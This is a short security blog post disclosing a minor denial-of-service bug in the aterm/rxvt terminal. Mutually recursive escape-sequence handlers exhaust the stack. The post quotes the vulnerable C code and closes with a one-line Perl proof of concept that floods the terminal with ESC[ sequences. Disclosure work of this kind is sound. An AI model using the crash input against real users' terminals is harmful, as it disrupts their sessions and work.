aterm/rxvt minor DoS

Return to dashboard ⇪

Sections

lang: |
RSS: |
About me
Tools
→ YT YouTube (EN)
→ D Discord
→ M Mastodon
→ T Twitter
→ GH GitHub

My company's website

Paged Out! zine

Dragon Sector CTF Team

Links / Blogs

Posts

// copyright © Gynvael Coldwind
// design & art by Xa
// logo font (birdman regular) by utopiafonts / Dale Harris

/* the author and owner of this blog hereby allows anyone to test the security of this blog (on HTTP level only, the server is not mine, so let's leave it alone ;>), and try to break in (including successful breaks) without any consequences of any kind (DoS attacks are an exception here) ... I'll add that I planted in some places funny photos of some kittens, there are 7 of them right now, so have fun looking for them ;> let me know if You find them all, I'll add some congratz message or sth ;> */

Vulns found in blog:
* XSS (pers, user-inter) by ged_
* XSS (non-pers) by Anno & Tracerout
* XSS (pers) by Anno & Tracerout
* Blind SQLI by Sławomir Błażek
* XSS (pers) by Sławomir Błażek

aterm/rxvt minor DoS

Minor DoS due to stack exhaustion.

File: command.c:

void
process_escape_seq(void)
{
...
   case '[':
       process_csi_seq();

...


/*{{{ process CSI (code sequence introducer) sequences `ESC[' */
/* PROTO */
void
process_csi_seq(void)
{
...
   ch = cmd_getc();
...
       } else if (ch == 033) {
           process_escape_seq(); // XXX GYN: nice... reaallly nice ;p

Ups, stack exhaustion.

PoC exploit:
perl -e 'print "\033["x100000'